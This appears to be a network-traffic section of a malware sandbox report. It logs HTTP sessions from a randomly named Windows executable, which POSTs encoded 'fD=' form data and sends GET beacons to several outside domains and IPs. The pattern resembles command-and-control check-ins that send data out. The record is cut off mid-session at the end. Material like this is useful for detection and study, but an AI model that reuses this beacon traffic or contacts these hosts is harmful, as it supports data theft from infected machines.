74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	34.149.87.45	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:12.345733881 CEST	756	OUT	POST /fkxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.magnoliahairandco.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.magnoliahairandco.com Referer: http://www.magnoliahairandco.com/fkxp/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 76 37 45 59 72 65 4e 76 41 45 67 66 38 5a 52 51 68 75 61 32 33 49 64 62 7a 4c 45 36 76 69 56 63 65 39 34 72 79 67 73 33 54 45 36 49 6f 74 6b 33 4e 30 43 34 6f 34 64 74 54 5a 2f 45 68 71 59 76 5a 69 49 76 6c 34 6e 55 73 76 7a 70 2b 37 53 53 44 6c 5a 79 59 6b 46 59 72 6e 4c 53 65 6d 44 65 6b 4c 44 69 66 64 77 57 79 30 34 5a 6e 34 47 4d 35 30 32 49 38 53 57 32 39 63 4a 6c 4c 36 45 59 65 4b 42 7a 68 43 47 53 72 6c 6d 61 77 65 49 43 57 37 6f 4f 32 36 75 45 53 50 2b 58 75 51 53 5a 64 6d 33 47 57 5a 5a 41 34 4f 50 35 6a 47 47 54 76 56 6d 46 48 68 44 62 6b 70 35 46 47 77 6f 38 65 59 43 73 56 79 76 54 4b 67 37 37 6b 74 45 48 Data Ascii: fD=y+I+zarb1XLEv7EYreNvAEgf8ZRQhua23IdbzLE6viVce94rygs3TE6Iotk3N0C4o4dtTZ/EhqYvZiIvl4nUsvzp+7SSDlZyYkFYrnLSemDekLDifdwWy04Zn4GM502I8SW29cJlL6EYeKBzhCGSrlmaweICW7oO26uESP+XuQSZdm3GWZZA4OP5jGGTvVmFHhDbkp5FGwo8eYCsVyvTKg77ktEH
Jun 13, 2024 11:04:12.974771976 CEST	676	IN	HTTP/1.1 403 Forbidden Content-Length: 146 Content-Type: text/html Server: Pepyaka X-Wix-Request-Id: 1718269452.8956164319392328281 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Thu, 13 Jun 2024 09:04:12 GMT X-Served-By: cache-dfw-kdfw8210045-DFW X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB Via: 1.1 google glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	34.149.87.45	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:14.885938883 CEST	1773	OUT	POST /fkxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.magnoliahairandco.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.magnoliahairandco.com Referer: http://www.magnoliahairandco.com/fkxp/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 76 37 45 59 72 65 4e 76 41 45 67 66 38 5a 52 51 68 75 61 32 33 49 64 62 7a 4c 45 36 76 69 64 63 65 49 73 72 31 78 73 33 53 45 36 49 32 64 6b 32 4e 30 43 6c 6f 34 46 70 54 5a 36 2f 68 6f 51 76 59 45 45 76 79 38 37 55 6c 76 7a 70 6d 37 53 54 62 46 5a 6e 59 6b 31 63 72 6a 76 53 65 6d 44 65 6b 4a 72 69 50 65 6f 57 30 30 34 65 33 49 47 51 72 45 33 47 38 53 2f 44 39 63 4e 54 4b 4d 30 59 64 75 74 7a 75 51 75 53 74 31 6d 63 33 65 49 61 57 36 55 52 32 36 79 79 53 50 69 75 75 54 43 5a 4d 53 36 61 45 36 73 63 67 73 6a 67 75 52 2b 6a 30 6c 6d 5a 47 77 33 36 68 2b 51 6a 4e 79 70 65 52 76 32 49 55 79 69 30 4f 6d 66 38 75 6f 70 4f 43 68 50 52 74 57 55 48 30 38 56 47 56 65 47 5a 65 2b 70 6a 33 58 30 62 63 64 32 36 35 54 73 64 70 41 70 36 4b 33 42 6a 77 36 78 6c 4c 65 61 34 71 32 41 70 6f 4f 6d 6f 42 46 37 59 71 43 2b 57 47 51 4f 64 75 56 73 68 62 78 45 6d 6d 76 54 77 65 52 52 38 34 73 61 5a 73 65 71 56 67 46 76 78 53 74 48 52 71 43 32 37 2f 74 2f 4d 39 52 43 56 59 43 77 [TRUNCATED] Data Ascii: fD=y+I+zarb1XLEv7EYreNvAEgf8ZRQhua23IdbzLE6vidceIsr1xs3SE6I2dk2N0Clo4FpTZ6/hoQvYEEvy87Ulvzpm7STbFZnYk1crjvSemDekJriPeoW004e3IGQrE3G8S/D9cNTKM0YdutzuQuSt1mc3eIaW6UR26yySPiuuTCZMS6aE6scgsjguR+j0lmZGw36h+QjNypeRv2IUyi0Omf8uopOChPRtWUH08VGVeGZe+pj3X0bcd265TsdpAp6K3Bjw6xlLea4q2ApoOmoBF7YqC+WGQOduVshbxEmmvTweRR84saZseqVgFvxStHRqC27/t/M9RCVYCwJJbX7sc7a3F9pk81FWevBwjrOvHlVe0N1uBr1YB478js/xZoZLR7GeI8p6YufoEWGBuRdjH49ooUaTEb2VaWVeqLBa/BJx5SrLa6VsiK/borwjPdnMfPvuLVDbjO9XJFxFlM04IXrpx7HGdE6MWX6+Ww6etrF2xpgimv79cOsOTZ/WFGCjGOLPQyvdx1PdTqGT3szPHpnGM8T0ReCQIFBi/VugTWBgcJW6G0MnLKDOlkqGMx7xxMwWM+OYrrk+jNKUQIe8zud55q4NcZ3I42OiFvv94bDoE4HuXtwXZyrZUtKg1Ps7/4919/097QK4vPnRSFIRx4bccjqCXExjr7HIfAH8d+fcZ502GZys4rwuqkW5iy+Ww/n/OMPwpkLRpGmAGxNQW3goiJYrsv3OAG+Znb1OiWOWr9pUf5ELsRbRGw87IUOPniLjnaQ8058q5p65reLQK1oUK72I5mcJPoaXQXBYjO4PDuZHaSlKQ4tTEajbT2JxGLqPfmYC6xQKtxIf/o0+M4gQZRsCEAMb01RylL230rXSJrWYfAR1+3aL6ZxvT/JjH1cLumwvTL9auTyWCo8WSU6vSWa6yv8gcRJILB64eS+lkM1haKQPzoaEYuHuGFbnZgHAKMjFwyYxrvVlq6Q0x0oU6a4vLPU2iN48PWzZWmh1jMNc [TRUNCATED]
Jun 13, 2024 11:04:15.522519112 CEST	675	IN	HTTP/1.1 403 Forbidden Content-Length: 146 Content-Type: text/html Server: Pepyaka X-Wix-Request-Id: 1718269455.443615245186345853 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Thu, 13 Jun 2024 09:04:15 GMT X-Served-By: cache-dfw-kdfw8210119-DFW X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLmUP/ddjOIocgASMjPBcXg4O5u3dMxPR3QRc6kpLZVuH Via: 1.1 google glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49719	34.149.87.45	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:17.415822983 CEST	460	OUT	GET /fkxp/?fD=/8gewv/74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4/yxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.magnoliahairandco.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:04:18.084137917 CEST	1010	IN	HTTP/1.1 301 Moved Permanently Content-Length: 0 Location: https://www.magnoliahairandco.com/fkxp?fD=%2F8gewv%2F74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4%2Fyxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ%3D%3D&j0=vTcl_2X8QJ Strict-Transport-Security: max-age=86400 Cache-Control: no-cache X-Wix-Request-Id: 1718269457.986616294881725311 Server: Pepyaka X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Thu, 13 Jun 2024 09:04:18 GMT X-Served-By: cache-dfw-kdfw8210177-DFW X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLvRKfhx2uNN4hv3eFGgKFZEa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalr/hWRkg9dc4n00XWDNAGIAaiwiNS8SVwwtTdHmRvV4+FWz1mLn+pfLpQc9j2BgSiA==,68oyKEO+Zhr/eqEDyeJ4STp46C1aUBV1vKlPPkrDKZA=,j1W3GTXLqH1rFP/nP6vn5uo9g7zRqt6eMBsYkOwtyGMd+I/NclgLYqmiJsPTSAdd/L54K3FAE+MTjSD730E1Mw== Via: 1.1 google glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49720	116.213.43.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:23.474843025 CEST	706	OUT	POST /a472/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.binpvae.lol Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.binpvae.lol Referer: http://www.binpvae.lol/a472/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 75 6b 31 78 2f 54 45 41 4a 74 30 74 73 75 39 6a 4c 46 39 58 57 4b 38 7a 67 45 75 48 43 6d 49 4c 44 52 6d 2f 74 57 59 4c 7a 4d 35 42 63 58 71 5a 57 63 50 55 2f 50 30 50 64 59 62 32 36 30 46 71 69 2b 79 74 4f 79 6e 64 61 4b 56 6b 2b 67 6a 48 73 47 4b 68 4d 38 48 59 76 49 73 7a 2b 73 33 4a 77 77 6f 4a 6a 7a 5a 42 67 68 63 7a 4c 74 4f 78 6b 51 63 35 5a 62 45 48 59 42 49 78 74 2f 6c 68 78 73 45 43 6c 53 31 32 7a 66 66 33 32 4c 4d 6b 66 33 2b 37 4c 32 6a 45 33 46 41 70 2b 37 5a 59 7a 41 53 77 44 51 48 36 5a 66 6b 35 61 53 33 6c 7a 76 66 6a 4d 4f 67 69 4f 33 6c 44 54 30 65 33 38 51 54 35 30 37 45 3d Data Ascii: fD=uk1x/TEAJt0tsu9jLF9XWK8zgEuHCmILDRm/tWYLzM5BcXqZWcPU/P0PdYb260Fqi+ytOyndaKVk+gjHsGKhM8HYvIsz+s3JwwoJjzZBghczLtOxkQc5ZbEHYBIxt/lhxsEClS12zff32LMkf3+7L2jE3FAp+7ZYzASwDQH6Zfk5aS3lzvfjMOgiO3lDT0e38QT507E=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49721	116.213.43.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:26.010145903 CEST	726	OUT	POST /a472/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.binpvae.lol Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.binpvae.lol Referer: http://www.binpvae.lol/a472/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 75 6b 31 78 2f 54 45 41 4a 74 30 74 74 4f 4e 6a 4a 6d 6c 58 54 71 38 79 6c 45 75 48 4c 47 49 50 44 57 75 2f 74 54 67 62 7a 2b 64 42 63 79 4f 5a 58 64 50 55 79 76 30 50 4a 49 61 79 6c 6b 46 39 69 2b 2b 4c 4f 77 44 64 61 4b 42 6b 2b 6c 48 48 76 78 57 69 4d 73 48 57 6b 6f 73 74 7a 4d 33 4a 77 77 6f 4a 6a 7a 4e 37 67 6e 30 7a 4c 64 2b 78 6c 78 63 36 46 4c 46 31 62 42 49 78 67 66 6c 6c 78 73 45 72 6c 57 31 59 7a 63 6e 33 32 4b 38 6b 63 69 53 30 43 32 6a 65 70 31 42 6a 79 49 6b 54 79 44 4f 38 45 78 4f 43 4e 50 70 41 53 45 61 50 70 4e 58 4c 66 75 4d 61 65 6b 74 30 43 45 2f 65 6d 7a 44 4a 71 73 53 6f 75 63 36 75 35 39 30 77 78 55 49 52 6c 71 46 69 43 42 58 67 Data Ascii: fD=uk1x/TEAJt0ttONjJmlXTq8ylEuHLGIPDWu/tTgbz+dBcyOZXdPUyv0PJIaylkF9i++LOwDdaKBk+lHHvxWiMsHWkostzM3JwwoJjzN7gn0zLd+xlxc6FLF1bBIxgfllxsErlW1Yzcn32K8kciS0C2jep1BjyIkTyDO8ExOCNPpASEaPpNXLfuMaekt0CE/emzDJqsSouc6u590wxUIRlqFiCBXg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49722	116.213.43.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:28.539844990 CEST	1743	OUT	POST /a472/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.binpvae.lol Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.binpvae.lol Referer: http://www.binpvae.lol/a472/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 75 6b 31 78 2f 54 45 41 4a 74 30 74 74 4f 4e 6a 4a 6d 6c 58 54 71 38 79 6c 45 75 48 4c 47 49 50 44 57 75 2f 74 54 67 62 7a 2b 56 42 63 45 53 5a 58 2b 33 55 39 50 30 50 56 34 61 78 6c 6b 46 38 69 2b 6d 50 4f 77 2f 4e 61 4a 35 6b 34 44 62 48 6e 6c 69 69 43 73 48 57 72 49 73 77 2b 73 33 6d 77 77 34 4e 6a 77 31 37 67 6e 30 7a 4c 66 6d 78 78 51 63 36 48 4c 45 48 59 42 49 74 74 2f 6c 42 78 74 67 61 6c 57 77 74 79 74 48 33 32 71 73 6b 4d 45 47 30 4e 32 6a 41 6f 31 41 32 79 49 6f 63 79 44 53 61 45 78 36 6b 4e 4d 4a 41 59 43 62 72 37 4d 58 64 4d 49 49 32 63 57 68 4c 53 6b 6e 2f 75 6c 2f 46 6e 4d 57 58 71 39 47 53 7a 74 49 4b 6c 57 52 35 6e 75 31 31 44 6b 53 31 45 73 2b 55 6c 74 58 2f 68 34 2b 54 31 43 45 42 48 63 63 72 53 69 4e 62 54 6b 44 65 43 2b 66 6f 72 4d 37 50 71 44 2f 61 6b 50 53 56 4c 36 79 34 4c 50 76 36 35 6c 44 6a 4a 72 59 4b 71 36 57 79 48 73 4c 44 4d 33 4c 58 79 32 75 72 4f 76 39 41 32 77 4d 2b 64 41 33 46 54 77 6f 59 64 66 4a 48 70 75 4b 53 47 67 30 31 43 2f 67 65 66 57 4e 79 54 36 35 [TRUNCATED] Data Ascii: fD=uk1x/TEAJt0ttONjJmlXTq8ylEuHLGIPDWu/tTgbz+VBcESZX+3U9P0PV4axlkF8i+mPOw/NaJ5k4DbHnliiCsHWrIsw+s3mww4Njw17gn0zLfmxxQc6HLEHYBItt/lBxtgalWwtytH32qskMEG0N2jAo1A2yIocyDSaEx6kNMJAYCbr7MXdMII2cWhLSkn/ul/FnMWXq9GSztIKlWR5nu11DkS1Es+UltX/h4+T1CEBHccrSiNbTkDeC+forM7PqD/akPSVL6y4LPv65lDjJrYKq6WyHsLDM3LXy2urOv9A2wM+dA3FTwoYdfJHpuKSGg01C/gefWNyT65WllRkudORJDIYg/QNmXVpl4YpKHgqjTChRmfoi6YJTBucb5OSe86TvwUKzphUKrJ8v4HzZ+rNVmy/9Wy6Z9gVAnU0JS3P1a2wKQm4EvU2byuUC8rYm901DGrT4Nzo30eIxLVTSTvSmZpfbSqVEg/hZCIWrajNiPsdPrPR4GIk0l+3MkMObq3kGq6tqpDXn3k8OB5qV581FWBrIbSFcHjD4x7IOXAksX/qhWuPzJFMO8CH9V36xttx0JlIddkYucn5r1m9zG+eU1uT3w65Vtev/Ix0UIz2FXKinsD6keTDrbCbDCguqmGKMvJDm7QpCoGCO1YC/sVO3FpYWrkiUf03+VQCiCz7/nONUDZVNODggUEV/6gnWAxib3znyR6SxyY5JnD+bblgxlLGr4q1dnIgcMquAwKUX1sNvXVETvriH4g8UcsmYRkQNmVwCghLO2g94UueVSOmOWzcrjv2tgCLB46MpsPG3riUKUzZuNBaWbuDcje3x2QtuPlqz6BmycQq+8ZZBBh6SuNalT/4XiN7J6CwLido1KW2Jha8+dvIualJcX4nAHCZskOWo7hTmQcNNZcQxkmFpKP3/7Ih636Csi5mnUCQ/WPsp1tCsrHBrirrX8LaX9RFXEchlvxz15ZQvlY3F3/9/FSxBwPowUC0YoeFO95EC5+Zw [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49723	116.213.43.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:31.072978020 CEST	450	OUT	GET /a472/?fD=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.binpvae.lol Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49724	102.222.124.13	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:44.705888033 CEST	703	OUT	POST /6tsi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.duzane.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.duzane.com Referer: http://www.duzane.com/6tsi/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 36 30 34 67 56 68 2f 6c 47 75 62 66 7a 4f 4d 54 48 4c 62 54 4d 45 53 48 6b 79 54 78 57 43 48 66 37 78 66 59 78 51 63 36 58 62 2f 35 46 54 5a 51 49 31 6b 41 37 48 70 6c 6a 7a 58 6f 45 62 68 38 55 6e 52 44 78 43 44 53 66 37 55 73 6d 34 49 32 4c 30 79 4b 42 49 55 48 6a 57 69 37 64 63 4e 53 32 7a 53 35 78 30 61 7a 42 7a 58 73 65 2b 64 69 34 7a 61 52 39 66 6a 66 52 32 44 32 61 75 7a 51 50 4b 41 73 37 75 63 42 66 6f 70 76 6a 7a 59 4a 52 61 30 57 53 50 44 6b 43 62 6f 4a 6b 2b 67 39 67 53 2b 6f 77 74 4e 52 43 6a 77 39 71 4e 72 77 44 77 31 31 6e 6a 79 6c 56 4f 77 74 43 49 68 2f 74 55 7a 63 65 61 49 3d Data Ascii: fD=604gVh/lGubfzOMTHLbTMESHkyTxWCHf7xfYxQc6Xb/5FTZQI1kA7HpljzXoEbh8UnRDxCDSf7Usm4I2L0yKBIUHjWi7dcNS2zS5x0azBzXse+di4zaR9fjfR2D2auzQPKAs7ucBfopvjzYJRa0WSPDkCboJk+g9gS+owtNRCjw9qNrwDw11njylVOwtCIh/tUzceaI=
Jun 13, 2024 11:04:45.857795954 CEST	990	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 13 Jun 2024 09:04:45 GMT server: LiteSpeed location: https://www.duzane.com/6tsi/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49725	102.222.124.13	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:47.243145943 CEST	723	OUT	POST /6tsi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.duzane.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.duzane.com Referer: http://www.duzane.com/6tsi/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 36 30 34 67 56 68 2f 6c 47 75 62 66 68 2f 38 54 46 73 76 54 4b 6b 53 45 72 53 54 78 66 69 48 62 37 78 54 59 78 56 39 68 55 74 50 35 46 79 46 51 50 45 6b 41 38 48 70 6c 73 54 58 70 63 37 68 4e 55 6e 64 39 78 41 58 53 66 37 41 73 6d 35 34 32 4c 44 6d 4a 44 59 55 46 71 32 69 35 51 38 4e 53 32 7a 53 35 78 30 4f 56 42 7a 50 73 66 4f 4e 69 35 53 61 53 33 2f 6a 63 46 6d 44 32 65 75 7a 4d 50 4b 41 4b 37 72 30 6e 66 72 52 76 6a 79 49 4a 53 4c 30 5a 63 50 44 6d 4e 37 70 58 76 75 4e 4d 6f 42 6d 78 77 75 52 51 63 41 6f 30 6d 62 47 61 5a 53 39 64 30 44 65 64 46 64 34 61 54 34 41 57 33 33 6a 73 41 4e 65 62 6c 75 70 68 70 43 70 74 59 47 69 59 38 77 33 6d 74 4d 6d 50 Data Ascii: 